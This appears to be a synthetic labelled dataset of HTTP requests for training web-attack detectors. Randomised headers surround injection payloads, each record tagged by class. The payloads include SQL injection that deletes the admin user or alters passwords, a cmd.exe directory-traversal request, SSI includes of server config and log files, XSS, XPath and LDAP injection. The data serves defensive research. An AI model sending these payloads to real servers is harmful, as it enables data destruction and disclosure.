GET /gss53onSc5wir2enemn/a70TZBrv3Nw5-/Ggp.Nkjiw3/yGspkaDrSeK@VgSF/pt7M3/ihlr/aDcLg301wdzpn@Mwykx/aG4xtzl7/ejwai6GielrTlciRe/tres9er/w2S_4sKITj6DHHQZDFWc/7z.tiff?adsrnoamaanp=42360893&lbnPS=xRe&cnr=t-&7eeecuft3n8ad=3640732&UQQLf0O8BW=ei93s6urU+Deuie&vetet=%27+AND++USER_NAME%28%29%3D%27cdHihy&hsNgocpt=ic&ge=3009642065&o5eeahtxodiS7l1=snxeRlexah&8gT6e2w=52101&0yrt=%3Ds&qostnxcr=g14dtso HTTP/1.1
Host: www.jtacpy.it
Connection: keep-alive
Accept: */*
Accept-Charset: *;q=0.0
Accept-Encoding: compress;q=0.3
Accept-Language: mi-ene3r, 0-Lebdrbh;q=0.0, nmTclem-qod;q=0.2, ryahoEho-4h
Cache-Control: max-age=761
Client-ip: 122.232.49.16
Cookie: 3woNlejepd=llurs;Hfnna8ee=j;rhy
Cookie2: $Version="194"
Date: Mon, 17 Jan 05 20:30:28 UTC
ETag: "B6_UDH4KS-1i1Exc6"
Expect: aseUtnu
From: ruin@msg0oh.fr
If-Modified-Since: Sat, 11 Apr 09 08:25:40 UTC
If-Unmodified-Since: Fri, 20 Feb 09 23:21:24 CET
If-Match: *
If-None-Match: "ueeJa0Dl8Tb3UVx"
If-Range: Tue, 10 Jul 07 16:52:19 GMT
Max-Forwards: 937
MIME-Version: 6.8
Pragma: uuOfoxn='nr'
Proxy-Authorization: NTLM VGVkNHBpZjUzc3l6dm5wZ3RtdG5kb2FoM2RuZW5vdTJhc3Rvb2ZycHNoc2g=
Authorization: Digest response="DeB62Ee30CbE21D0caBDACc5B0739069"
Range: 1609-18413
Referer: http://www.yiao.be/kqcwS/es9u/nu5eas/jtmsb5bn.cfm
TE: trailers,chunked;q=0.5
Trailer: Host
User-Agent: teuEcRy/4.4
UA-CPU: 68000
UA-Disp: 3189,7325,32
UA-OS: Solaris
UA-Color: color32
UA-Pixels: 739x825
Via: 7IcryI/4.1 84.70.207.70, 0.1 17.232.51.233
Transfer-Encoding: evtn; rnnyn5=5ugf3o
Upgrade: gerh/9.6
Warning: 445 236.92.54.164 "ihposkezh6eanidatou6" "Sun, 23 Apr 06 11:05:08 UTC"
X-Forwarded-For: 70.158.64.159
X-Serial-Number: 06713
----: --------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 35357
Start - Id: 41320
class: SqlInjection
GET /50xg/SDwg1YzRn.css?echrIc9lmlhh8n=rofc&sas=o9dagsdIwhereElhN&PWZMul54.S=wnnOstaOneuuI HTTP/1.1
Host: 243.247.221.86:048
Connection: close
Accept: */*
Accept-Charset: iso-8859-7, euc-jp, x-mac-icelandic
Accept-Encoding: *
Accept-Language: *
Cache-Control: max-age=214
Cookie: ._@gk7=;alter    table   siar set    password  =    'xS4rsa'     where  name =     'lhsmdnse';;m5io=77960034;uzfteuArqnbqr=shtsezwmdie2
Cookie2: $Version="115"
Date: Sat, 25 Dec 04 07:54:20 UTC
ETag: "OTd0HtIhFN@9vA5Y-4Ke"
Expect: 100-continue
If-Modified-Since: Fri, 10 Sep 04 22:00:40 GMT
If-Unmodified-Since: Mon, 08 Mar 10 07:14:02 UTC
If-Match: "ADdtBQ-fHXj1trrAp"
If-None-Match: "5diRmMPMh.AJzXoFTRf"
If-Range: *
Max-Forwards: 8047
MIME-Version: 0.2
Pragma: dtt='e'
Referer: /eNwnnnmr/ciynr8/Lodsep.asmx
TE: deflate;q=0.4,trailers,trailers
User-Agent: Mozilla/6.8 (Machintosh; U; PPC Mac OS X 2.6; 9i-f2; rv:1.3.7) Gecko/63456097
UA-OS: Windows 98
UA-Pixels: 654x944
Transfer-Encoding: identity
Upgrade: z7mnyi/7.1, meohI/0.8, eOtfa/4.5, rnyaca/2.1, mina/5.4
Warning: 906 www.C8ogb.jpg "cflnxg4Nltoxcssnedi" 
X-Forwarded-For: 200.57.246.66

null

End - Id: 41320
Start - Id: 49365
class: XPathInjection
GET /pFO23Y3openniu3Rq/uioe/XncRSQyT./5-GHoYBRY/izyTbeTHXflEsr9/nt/oJuTiDZGqnlCK6fC/usba7t/select_A-3sx/uhoadtRgcaotuhei2Eji.png?faNah=6&oqyt1uel8=3G0aS&feArTeh7oa4et=51697607&LtFb=ctetbatelnet&cgost=sdao%27%5D++%7C+P++%7C++%2F%2Fuser%5B++name%2Ftext%28++++%29+%3D++++%27kel&woltibzdegiDre=15694&odOA=insertsiftpd&L6=nolpIoenwst2&uko2erToElhh=lsc&eRiznrOa8dsnsz=ie&ud0leto8=744&a9=%40nie&Ff=neelIlomfO6vct&hxpDaip72ol5a=829767966 HTTP/1.1
Host: www.srel4misbL.biz
Connection: lirtHem
Accept: */*;q=0.3
Accept-Charset: *;q=0.8
Accept-Encoding: *;q=0.0
Accept-Language: wn-onh;q=0.8, szd-sP3mcno, lane-eugePa7;q=0.8, strltbe-qbbgYE, es-3ksfri;q=0.3
Cache-Control: sta='oaeoeadw'
Client-ip: 30.6.154.223
Cookie: IHeeegnUeXdrt=399919;9@QOautoexecLI=edHl|tcuz%a;aGtalcutpOYTee5=<miwH;teddN=o-W2Ia_y1n;opp5m5wschFmdsh=9ireooeeRs0dAgot
Cookie2: $Version="93"
Date: Wed, 01 Apr 09 03:21:31 GMT
ETag: "gRqaxicCjKmiIeMRRJ"
Expect: aaso
From: deodan@edhI.net
If-Modified-Since: Sun, 28 Aug 05 09:49:31 UTC
If-Unmodified-Since: Fri, 10 Oct 08 06:00:11 UTC
If-Match: "7DheMCjIC6iresQ6Eb"
If-None-Match: *
If-Range: *
Max-Forwards: 6756
MIME-Version: 2.9
Pragma: jgosdoiC=pe7rd
Proxy-Authorization: Digest uri=http://efar.be/thtuh/euhhew3a/theOa.conf
Authorization: gEen je4f=me70Ymri
Range: -9178,535260-09009
Referer: http://etyvng.uk/rondn/nsctudnW/ire0tw/aEoR66ni/eJOeb3wu.php
TE: chunked;q=0.5
Trailer: Pragma
User-Agent: rtt5ttnaad/7.2.0.3.3
UA-CPU: StrongARM
UA-Disp: 646,996,8
UA-OS: Windows 95
UA-Color: color32
UA-Pixels: 3843x971
Via: 7Ebau/2.5 108.53.127.40, 9.2 www.eatkmm.shtml:8
Transfer-Encoding: compress
Upgrade: wsem/7.8, MtRxo/3.9, i75/3.8, tecnp/1.2
Warning: 935 246.135.154.171 "wpboie" "Tue, 30 Jun 09 03:56:30 UTC"
X-Forwarded-For: 100.79.4.137
X-Serial-Number: 68426632486242488
----: ----------------------------
~~~~~: ~~~~~~~~~~~~~

null

End - Id: 49365
Start - Id: 42580
class: SqlInjection
GET /.LJ@3QY5echoNZXqcc/XAVh/pezPecsljucaQ9gtetbi/odetitseseH/staA/eJaS/i@1x3F3kuD/gch7yjhfzhzvnirer/ree7ae2temEoeeHloea/rtR_pnKNZeao2@y4/dcGYj7basr_dhhCd.php4?0vhldS3tehusw=65&a29mde=3inputcxbetween&oyens3ri=Drr%27++%29%3B++DELETE++FROM++++users++WHERE++upper%28username%29+++%3D+++upper%28++++%27admin&a8un3deteeer=67&9EgotHie7sde=vx84cYdq&imgtdesmwqsaytm=5&gaiNpebadae2=72 HTTP/1.1
Host: www.mdejzzts.it
Connection: keep-alive
Accept: */*
Accept-Charset: *;q=0.9
Accept-Encoding: 
Accept-Language: im-v, anh9fvot-ltaotti, enE-de7;q=0.3, aAcnpsr-r
Cache-Control: annoptws=uDra3r
Client-ip: 8.53.51.76
Cookie: 8yowoeecbsthm=tV9frie;eiebnaaiubdhu=5;stu2saeqaeko=9235
Cookie2: $Version="6"
Date: Sun, 24 Aug 08 07:32:59 UTC
ETag: "HhGZbuy.Xmq6SqA2ziN"
Expect: wshtlUla
From: tmTstilr@oerx.it
If-Modified-Since: Wed, 10 Jun 09 15:04:01 GMT
If-Unmodified-Since: Sun, 01 Jan 06 24:54:21 GMT
If-Match: *
If-None-Match: "hlq23lU3Oh7z.8.ZDu"
If-Range: Mon, 23 Aug 04 03:16:17 UTC
Max-Forwards: 0109
MIME-Version: 2.8
Pragma: no-cache
Proxy-Authorization: Basic Nm9UYWV3c3I6bmUzYQ==
Authorization: NTLM eWFhdWlvV3N6b2l0T3RoYWczdndrcnRhbm1pdE1yaHRod29jcmlkTGF3
Range: -327,463619-533,09-501926
Referer: /ea9dE/aTvr0l/ahrShoh/teewe.aspx
TE: trailers,trailers
Trailer: From
User-Agent: ev4i1Qj/4.9.3
UA-CPU: MIPS
UA-Disp: 8242,0192,32
UA-OS: Linux
UA-Color: color32
UA-Pixels: 161x8196
Via: HTTP/0.3 www.5hrc.jpg, HTTP/9.8 130.173.125.146, 8.4 www.cwoefurv.tiff
Transfer-Encoding: compress
Upgrade: lxiev/4.8, Sc4/5.2, owd/0.5
Warning: 740 www.flc6.js "aobefTi4oh6lxaa" "Sat, 01 Jul 06 04:47:36 CET"
X-Forwarded-For: 149.227.177.29
X-Serial-Number: 2472184980501898404
----: -----------------------------------
~~~~~: ~~~~~~~~~~~~~~~

null

End - Id: 42580
Start - Id: 41562
class: SqlInjection
GET /ns3yKvbosgcytqw/tmyeeire6jbe/eV_YH9Ju/dcdonchydsafvp8Essn/tf/wbetweenTall/oswlze6utndftweuoc/e9een2ercutaA.bin?sjgw6reeOr1=2&NkinrsP2E=Gte0&EhavinghEce_U02delete1=raccess_logh&Ree=in0amailunso2ve%40rwe&Ocetpe=%3B+++EXEC%28%27UNI%27%2B%27ON%27%2B%27++%27%2B%27SEL%27%2B%27ECT++++%27Izdsaaboh%27%2C4%2C2478%2C%27jaart6de%27%2C9+++FROM++++smneys45%29 HTTP/1.0
Host: 84.237.218.235
Connection: efarea
Accept: audio/basic
Accept-Charset: *;q=0.3
Accept-Encoding: identity;q=0.7
Accept-Language: *
Cache-Control: max-stale
Client-ip: 154.176.0.74
Cookie: qatlo7udnn8=92mRg-4lMz;hc4=ieval;eyEA=t@X2;MzobobjectNg=eihstyleIed adrrHn =[;rtz=1915982;inc=pt
Cookie2: $Version="799"
Date: Sat, 30 Jun 07 14:31:14 GMT
Expect: 100-continue
From: usaacy07@scsi6.be
If-Modified-Since: Mon, 28 Dec 09 06:57:54 CET
If-Unmodified-Since: Tue, 05 Jan 10 16:23:31 UTC
If-Match: *
If-None-Match: *
If-Range: Tue, 26 Oct 04 18:27:15 GMT
Max-Forwards: 5935
MIME-Version: 4.6
Pragma: 1n=tn
Proxy-Authorization: Digest cnonce="uSmsdotr"
Authorization: NTLM Y0Vzc3Qzd2FvYWlFYXR0Y2lvb2VvbWNkVG9vdTgxb3RyZnJ5bGQ=
Range: -4865,558329-,-5
Referer: http://temu.st/37rrncum/hlihi/9oHuee/szqq/llebatee.mpg
TE: trailers,trailers,chunked;q=0.9
Trailer: Connection
User-Agent: Mozilla/5.5 (Windows; U; Windows NT 1.0; hh-ti; rv:0.8.0) Gecko/10364037
UA-OS: Solaris
UA-Color: color8
UA-Pixels: 1852x515
Via: vjti2i/8.3 www.uRhR3ler.tiff:388, 5.5 www.hice.js
Transfer-Encoding: gzip
Upgrade: 1uitte/1.5, Ore6/5.0
Warning: 868 212.59.150.87 "tTe6e" "Fri, 15 May 09 11:43:43 UTC"
X-Forwarded-For: 166.15.230.232
----: --------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 41562
Start - Id: 49509
class: XPathInjection
GET /gZ08.60q3W6r9/iF5.php3?awiVws0iamr=ot3+a&xhg9imC1irsi9=me&mimjtensities=th&ibnbrsqige6=8v%40eOv&sleetehht2a=nserjMpasswdia+e&dJ-0w=t7wman%3DoeSo&oV0ahavingQ=dgPR&teclyo=aehdrsredherCsid&sT=ftpr%27ys&reloattHine=sasho6d7kp&7IUnseeqnnsmnsv=%28i+++++%3C+++++count%28Tau%2Fchild%3A%3Atext%28%29%29++and+++j+%3C+count%28rsciqw%2Fchild%3A%3Acomment%28%29%29+++and+k+%3C+++++count%280rs%2Fchild%3A%3A*%29+%29&union@-7ekJWVin-=cne%5Ctoes7wgetqn&EadQrdocumentperl5EH=emYdagroup+bym+t%29o HTTP/1.0
Host: 129.100.13.47
Connection: bsr9atot
Accept: application/zip;q=0.6
Accept-Charset: *
Accept-Encoding: identity, compress, compress, identity;q=0.8, identity;q=0.9
Accept-Language: g-h2beI;q=0.0, g-foe, nlh-oohvl, npe-nerhhia, 4-o8Ax;q=0.1
Cache-Control: max-stale=0
Client-ip: 42.49.173.73
Cookie: fevMaroyuh=3;3rereynqeegLs= ooctnhu;hreiepodd=ozrpa
Cookie2: $Version="988"
Date: Thu, 19 Oct 06 12:32:46 CET
ETag: "CYNN_kOjXAGsYaD"
Expect: 100-continue
From: wEof2@etne.ch
If-Modified-Since: Mon, 30 Nov 09 06:24:18 GMT
If-Unmodified-Since: Sun, 13 Dec 09 20:57:57 UTC
If-Match: *
If-None-Match: "jXfoYw5SlSwVNd7CGXV"
If-Range: "-9BPWH.4WlUwV-5q-HX2"
Max-Forwards: 395
MIME-Version: 2.5
Pragma: no-cache
Proxy-Authorization: ao6tbr qsmelsdm=S7mcd8of
Authorization: Basic b2FsYmVlOnR3c3VuTjA=
Range: -88469
Referer: http://iseetmA.cz/iybnoc/Dthfdte/eireep/sAsdmigr/3inS7m.aspx
TE: trailers,trailers,deflate
Trailer: Date
User-Agent: til0rohlot
UA-CPU: Sparc
UA-Disp: 2924,8513,8
UA-OS: Windows 95
UA-Color: color8
UA-Pixels: 4726x3292
Via: 5.4 www.nhzio0eo.gif, 2.6 www.wfwftt.jpeg, i9i/1.1 www.toeOtt.js
Transfer-Encoding: deflate
Upgrade: n7e/3.5, tspSaa/1.0, aveuwt/9.7
Warning: 646 www.qqkiis.css "nsutrl9tXaNtumo" 
X-Forwarded-For: 113.38.28.52
X-Serial-Number: 201583507
----: --------------------
~~~~~: ~~~~~~~~~~~~~~~

null

End - Id: 49509
Start - Id: 36457
class: OsCommanding
GET /msadc/%2e%2e%2f%2e%2e/%2e%2e%2f%2e%2e/%2e%2e%2f%2e%2e/winnt/system32/cmd.exe?/c+dir HTTP/1.0
Host: 242.36.244.133
Connection: close
Accept: application/*
Accept-Charset: macintosh, windows-1253
Accept-Encoding: compress;q=0.1, gzip, gzip;q=0.4, identity, deflate
Accept-Language: *;q=0.5
Cache-Control: min-fresh=40
Client-ip: 9.139.53.150
Cookie: 4ou=0719;omo8t8twQ=roectoj
Cookie2: $Version="27"
Date: Sat, 27 Jan 07 08:01:41 UTC
ETag: "DiWsWZsCWsn9Y0BlI_"
Expect: 100-continue
From: u3u4saNf@h5ldevB.be
If-Modified-Since: Sun, 25 Jan 04 22:15:29 GMT
If-Unmodified-Since: Mon, 08 Mar 10 04:09:38 GMT
If-Match: *
If-None-Match: "1Qk_y9xvJ2JPIw.gBjJr"
If-Range: Thu, 09 Apr 09 14:03:25 CET
Max-Forwards: 599
MIME-Version: 8.0
Pragma: remiah2t=ninyos
Proxy-Authorization: NTLM RWVsZ1R0YXFwdGRyaDNhaWFpaVFnaWhtc0VwMm5vYTFsZ2FpZWNheXB0c2c=
Authorization: NTLM bnVobk5vaGt1aWhlY2VlaXN0UzZ1ZWVhaDB6dGNhZWl0TTE5c2g1MjVzcnRscA==
Range: 336-,5495-71936
Referer: /cu9du.msf
TE: deflate,trailers,chunked;q=0.8
Trailer: Via
User-Agent: geer7O/8.1.5
UA-CPU: Sparc
UA-Disp: 5073,578,16
UA-OS: Windows 95
UA-Color: color32
UA-Pixels: 006x6469
Via: 4.6 147.35.246.72, 9.2 234.94.153.224, HTTP/9.8 www.eet1duWi.jpeg
Transfer-Encoding: hsnq; otarnw=e9dd7
Upgrade: fet/9.1, iro/2.9
Warning: 940 176.201.209.211 "dndrrAtk" "Mon, 05 Jan 04 22:49:43 CET"
X-Forwarded-For: 183.18.72.245
X-Serial-Number: 8893219462168220047
----: ---------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 36457
Start - Id: 40780
class: SSI
GET /Eomibs2e4q/7tzormeiz9duoxooag/ya4/iY6IsbLN4nmovcs-9YWj/rLE/6tyiipswpau/sV.bin?q0A.K.7ls@havingD=es%2FnIe&wS_MOwSnetcat_insertp=4c6leHTmA-x&e2tiTeJlou=3oktaay8arisodehr&u3smnj=03262&tnrttetU=%3C%21--+%23odbc+++++statement++++%3D++++%22select++++dmm%2C++++wei%2C++scGcyo+from+hlhheac+++++order+by++1%2C++32%2C+1%22+++++--%3E&CtxAMg=methttps&odw=otytQbusrehq3stdin%25nen&xuuxqOOftpN=syiyoj7hc&Sate9Meeovyn=47692&kiAt4nHi3st2T=2&ye8guasurt=tayVtk&Qf0C@CylocationHpId=es&arwfseiei=996&mailBzCPuZJvbscript=4071 HTTP/1.1
Host: www.udRI8geam.st
Connection: tadyEht0
Accept: image/*
Accept-Charset: gb2312, cp-936;q=0.7, windows-1254, iso-8859-8;q=0.9
Accept-Encoding: 
Accept-Language: *;q=0.9
Client-ip: 3.106.80.189
Date: Wed, 22 Mar 06 20:02:23 UTC
ETag: "g8BPUE.bYxda8s-n2"
If-Modified-Since: Sun, 07 Mar 04 02:47:18 GMT
If-Unmodified-Since: Wed, 23 May 07 20:36:04 GMT
Max-Forwards: 51
Proxy-Authorization: Basic bmVoc2o6bDlxb2FsdA==
Authorization: Digest cnonce="jetatr"
Range: 317784-4,80-130,625-44564
Referer: http://www.ei0eRht.be/8qkg/ww3rbsa/te5by/7rx9.php4
TE: trailers,trailers
User-Agent: OIUk (dWkNW1x-; iQKXr5Z8NK; rezSbz; gb8LHbIJ; nu5CvFwAk3)
UA-Pixels: 593x4712
Via: 6.3 www.2nzldi.tiff, HTTP/8.2 21.126.76.87:8
Transfer-Encoding: identity
Upgrade: vgs/0.3

null

End - Id: 40780
Start - Id: 46484
class: XSS
GET /"><img src="javascript:alert(document.domain)">? HTTP/1.0
Host: www.acilatx.gov:80
Connection: keep-alive
Accept: */*
Accept-Charset: euc-jp
Accept-Encoding: compress, compress, identity;q=0.0, deflate, compress
Accept-Language: roe-oe7si;q=0.1, itasp-Y;q=0.5, n-enuE;q=0.0, 4a4ca-xc;q=0.4, DbOerr-j6
Cache-Control: max-stale=30956
Client-ip: 137.78.176.107
Cookie: 68wgetK=Lmai8sarlM;x_LYOWS@c9=Rratahe;loteen79sHpeus=p0fylrBFaHA8;s7qtnuya=519;ebdr4eyO=eewindow.opendmopencopyr[m;dcerfsYiye=9eTr&w2
Cookie2: $Version="45"
Date: Tue, 23 Mar 04 04:50:35 UTC
ETag: W/"TvYPSOTjowia_CfKxOZ"
Expect: tphW
From: musoa@e4qteeenfg.net
If-Modified-Since: Mon, 09 Oct 06 08:36:52 CET
If-Unmodified-Since: Thu, 03 Jan 08 05:49:02 GMT
If-Match: "GRRprY-a32sVKNEPB"
If-None-Match: *
If-Range: *
Max-Forwards: 189
Pragma: iyb7u=etotEb
Proxy-Authorization: NTLM MHN0bm50bmJ5dGFuemVvdXI0SFN0TnVzMTdlbzBtNGl3ZWV2dGhjeWlUbndmYg==
Authorization: NTLM aUV3ZnNvaG9zN29laW9mZWh0YXdlTnQwZWl0aWFnMWU=
Range: 875-8,3042-7550,-21263
Referer: /umtm/diitaani/uyai/b5r57/Miroil.wav
TE: chunked,trailers
Trailer: Pragma
User-Agent: Temeresae6eru
UA-CPU: x86
UA-Disp: 0683,5714,16
UA-OS: Win95
UA-Color: color16
UA-Pixels: 139x000
Via: FTP/7.2 199.212.207.210
Transfer-Encoding: compress
Upgrade: i9r6of/0.6, tAiumh/1.5
Warning: 531 119.150.242.26 "jTg2xs5tderoaEpt" "Tue, 19 Feb 08 13:25:57 UTC"
----: --------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 46484
Start - Id: 39769
class: SSI
GET /wEcbUuelSkrsudz/SmobjectBhzfc/Badminhome6.msf?UhtpassD8=+yshutdownqabosmn3gai&i4Q-rRftpaccess_logH.FP=%3C%21--+++++%23include+++++virtual%3D%22%2Fetc%2Fhttpd%2Fhttpd.conf%22+++--%3E&MphpCidLGMopen=edHborgini&Bgdivtv9=h+execl&mFA8GNn=425318035&hdnnCuae59uet=rrt&cred=m%7Cpdn3ht%5Dka&3passthrub.kRb_Aa_=9nhcdtaxs0Ho&B2zep=1871728614&iddf8ud=sTet&Yjo=oomcxus%3Dithnx HTTP/1.1
Host: 159.72.67.4
Connection: suesmu
Accept: */*;q=0.5
Accept-Charset: iso-8859-1;q=0.7, iso-8859-9;q=0.5, cp-932, windows-874, x-mac-arabic
Accept-Encoding: *;q=0.5
Accept-Language: *
Cache-Control: no-cache
Client-ip: 139.46.215.57
Cookie: awgrrioueon2eo=579289890;MKLiDVikR=ns;memi9ae=7267738518
Cookie2: $Version="565"
Date: Tue, 18 Aug 09 10:24:05 CET
ETag: "KSJ1INOt62MxhbrCE"
Expect: sn1i
From: OacnDS@rtOaiEAusz.net
If-Modified-Since: Sat, 24 Jan 04 05:30:51 CET
If-Unmodified-Since: Sat, 19 Nov 05 22:44:47 GMT
If-Match: *
If-None-Match: *
If-Range: *
Max-Forwards: 2634
MIME-Version: 5.1
Pragma: lN='t4hepako'
Proxy-Authorization: Digest algorithm=MD5
Authorization: m3ea a8bhgit=19sesn
Range: 42-82,601-32,-86
Referer: http://w1e6htwe.be/ackIn7u/modlik/cEidt.mdb
TE: gzip,trailers
Trailer: Trailer
User-Agent: d.cbrGlG http://www.aenee.biz
UA-CPU: 68000
UA-Disp: 3158,568,16
UA-OS: Win95
UA-Color: color16
UA-Pixels: 5615x413
Via: FTP/0.5 170.138.148.203
Transfer-Encoding: deflate
Upgrade: Lweoe/6.3, rgr/6.8, e3sni/8.6, oade/5.4, laewl/3.5
Warning: 205 www.oith.gif:14611 "vu8fShfdar5iamtid4" 
X-Forwarded-For: 127.158.27.136
X-Serial-Number: 544346041743957641
----: ---------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~

null

End - Id: 39769
Start - Id: 35283
class: SqlInjection
GET /cV7CfIzBkxD2.Z2s4pH/aedseo3hSRcToonhsyri/inLsav7Y7G8/og6@@F5euo6BgO0/esputituh/i4BtV/nArUP7sA.DhukGwaHq3S.jpeg?connectyAaccess_log=%27+OR+++%27tsymhpUcri%27++++BETWEEN+%27R%27+AND++%27T HTTP/1.0
Host: www.ig0I2h.fr
Connection: keep-alive
Accept: audio/x-wav, audio/*;q=0.2, text/plain;q=0.2
Accept-Charset: macintosh;q=0.8, x-mac-chinesetrad, x-mac-icelandic;q=0.9
Accept-Encoding: 
Accept-Language: udwraion-vheernh, tttwejo-b;q=0.7
Cache-Control: no-cache
Client-ip: 117.242.130.149
Cookie: rwmipolhehdPa=aei;295h7d=ihgee;oiceiurnssge=ah>eee>ehd/tl;omaaaletrh=hin3h
Cookie2: $Version="2"
Date: Sun, 14 Nov 04 22:10:01 UTC
ETag: "M@PjQaOlqVckX3an1@Ge"
Expect: 4onddn=eeoa33k;1ertegD=xiSjeb90
From: g1swIsn@rorentof.uk
If-Modified-Since: Wed, 26 Nov 08 09:58:44 CET
If-Unmodified-Since: Thu, 14 Apr 05 21:49:29 UTC
If-Match: *
If-None-Match: *
If-Range: Thu, 16 Feb 06 19:09:52 UTC
Max-Forwards: 664
MIME-Version: 8.3
Pragma: 8capena='qu4t'
Proxy-Authorization: NTLM bnFzaU5lenR0dWVzeFNuZXNiaVRsTFNiMnNhMmRzc3dhdGZzNg==
Authorization: Digest nc=2CdfbeAc
Range: 930-456,2355-
Referer: http://www.eehssedi.be/nooe.exe
TE: trailers
Trailer: Proxy-Authorization
User-Agent: Mozilla/4.7 (X11; U; Open BSD i386 9.3; qa-lO; rv:8.9.2) Gecko/40611068
UA-CPU: StrongARM
UA-Disp: 420,4746,32
UA-OS: FreeBSD
UA-Color: color8
UA-Pixels: 9202x764
Via: 2.1 www.meer.htm:6285, 4.4 www.ilut.tiff, 2.0 29.69.203.166
Transfer-Encoding: compress
Upgrade: bkt1c/0.9, a15/2.9, cEsxaa/0.5
Warning: 590 39.82.178.253 "aiHe" 
X-Forwarded-For: 162.78.14.7
X-Serial-Number: 045069362668
----: -------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 35283
Start - Id: 42356
class: SqlInjection
GET /iohoReezeec.msf?inemuobktiap=58095721&lln6nio=815475&shae3me=%27++++%29++++UNION+ALL+++++SELECT+1+FROM++++ca++++WHERE++++%28++%27%27++%3D%27&yheetegOtaN=eoo%27+%5Ct&cpjgand-NTzperlsystemM=2N6K&dQdSo=drtx&hanh=pBe%26 HTTP/1.1
Host: www.Ssnibst.com
Connection: keep-alive
Accept: */*
Accept-Charset: *;q=0.8
Accept-Encoding: 
Accept-Language: sE1-sDS3daue;q=0.7, emc-nonqht, r-dlLe, omEe5r-r;q=0.5
Cache-Control: me8uot='e'
Client-ip: 34.178.32.79
Cookie: msoaoeo83dae1t=3755;O387lbtev=es9SRmvQ7V;pdtiAuOidoafia=4820420;aoau=gl6delfft'Tsu;4se0mko3ai07iv=wgetgs;@KNBtg=687107
Cookie2: $Version="89"
Date: Sat, 13 Dec 08 14:55:24 GMT
ETag: "Jzw07-CaqNHQ-4c"
Expect: ieiqg
From: ttyr@nt7thnt6um.uk
If-Modified-Since: Thu, 19 Apr 07 23:00:35 UTC
If-Unmodified-Since: Wed, 06 Sep 06 06:54:49 CET
If-Match: *
If-None-Match: "f-1U4MQ5PQ4AqgK"
If-Range: Wed, 21 Feb 07 16:25:05 CET
Max-Forwards: 0
MIME-Version: 6.6
Pragma: nllcigJd=tehts9t
Proxy-Authorization: NTLM dWVtZjVhZVpub2RucmxwaW1ib2luaGlub29hU3RwYTE=
Authorization: NTLM c3V0aWFFbXpsN1lmZHJ0ZW91dm5ldHR1YXgycnJjYXI3c3JzeGNycnVydG43
Range: -966,396-333,-3990
Referer: http://eehvj.fr/Lvne.swf
TE: gzip,trailers
Trailer: Proxy-Authorization
User-Agent: etnBzYB8sC http://www.isnm9.fr
UA-CPU: x86
UA-Disp: 695,8049,32
UA-OS: Mac OS X
UA-Color: color16
UA-Pixels: 999x243
Via: FTP/0.2 60.178.177.40
Transfer-Encoding: identity
Upgrade: aia9y/5.8, shfr/4.4, ssoa/6.4
Warning: 408 www.eaxt.js "r7iatenLagSol" 
X-Forwarded-For: 171.143.1.2
X-Serial-Number: 71261
----: --------------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 42356
Start - Id: 37706
class: LdapInjection
PUT /erTbtinnAwFh8oegesr1/go/d4EbLr/eOyLYSC0AT1DC/woGX9h.YmJ1.shtml? HTTP/1.0
Content-Length: 337
Content-Language: hOelOKt
Content-Encoding: compress
Content-Location: http://oewde.de/l8wn/utdnS/amsests/tdopunis/remM.cgi
Content-MD5: cmZhdXQwaG5pZW5ldGhlaw==
Content-Type: application/x-www-form-urlencoded
Last-Modified: Sun, 09 Jan 05 23:33:27 CET
Host: 215.97.56.243
Connection: keep-alive
Accept: image/*;q=0.8, text/*
Accept-Charset: *
Accept-Encoding: 
Accept-Language: tw5lgh-q8dAf, miub5i-lh;q=0.2, 6weqh8e-4tzates;q=0.9, Rsocss-d, do2awh-mtt;q=0.9
Cache-Control: no-transform
Client-ip: 166.125.58.89
Date: Sun, 17 Apr 05 14:32:29 CET
ETag: "v.mhsc.s9Y_j12CiVkjp"
If-Modified-Since: Sat, 24 Mar 07 19:03:29 CET
If-Unmodified-Since: Mon, 04 Oct 04 15:56:13 UTC
If-Match: *
If-None-Match: *
If-Range: "DZ70iyTX.ylRK0e9Dy8t"
Max-Forwards: 1393
Pragma: 6=et
Authorization: NTLM bWZ0cm5hbmpqbmR6MW5vN3NyeW5wZG95dGVhaG90bGRlNm9lRW9hZXQ1dzg=
Referer: http://www.mos6in.ch/qedamse.jpg
TE: trailers,trailers
User-Agent: lsDudDe (eh6lHyiLpG; aM6xOu; lU2wIPb)
Transfer-Encoding: identity
X-Forwarded-For: 34.122.30.225

Tcd6e=d4Nolr%40K%5Bgousnt&acceptGxmhQi3L=%29+%28+++%7C+++%28+++cn%3D*o+++%27brien*+%29%28mail++%3D*o+++%27brien*%29++++&Cjor4N-XW0=e%3Fiznbodyt6&OeTdfnn=00&rrk8onn5mduie=57&%u@Tzh_usr5ra=M%3B%5CdS&@G_Estyle9N=Iex%3F+zcOt%7Cuscriptmw4s%7E&wadue2qod=6999251917&ra=07457&ntoEaes2e=u2rla&Rciel=10731&e7aaqxioieShi=5hNrc&.APuWppsTvdy=%5DcoEps

End - Id: 37706
Start - Id: 39781
class: SSI
GET /kjYPiSQdm/dGpLLO6/biDqKhttprT/iAVk_xuXBLiQruyGhg9/ipHyI1glv2lc/Vgtmyjr/b96FZA8R9/mneonto81/DdmroOeqml/tnisobiwoasyiivrd/GF7SEdivtRc3H5.js?sanft=%3C%21--+++++%23include++virtual%3D%22%2Fvar%2Flog%2Fhttpd%2Faccess.log%22--%3E HTTP/1.1
Host: www.p2eoAlnoo.be
Connection: close
Accept: audio/*, text/xml
Accept-Charset: *
Accept-Encoding: 
Accept-Language: to-n, aAfcte-lk;q=0.9, n9hlcb-i, sn-vrtdc
Cache-Control: no-cache
Client-ip: 211.6.11.10
Cookie: tgsmaeceuaenrd=dgr
Cookie2: $Version="35"
Date: Mon, 23 Oct 06 02:13:30 UTC
ETag: W/"DTt6JelSuwDXAPxr"
Expect: ae0oP=nu1EYl;0lwbh5rr=kbremoe0
From: 6Rvlor@tljncre.cz
If-Modified-Since: Thu, 10 Jul 08 19:14:45 CET
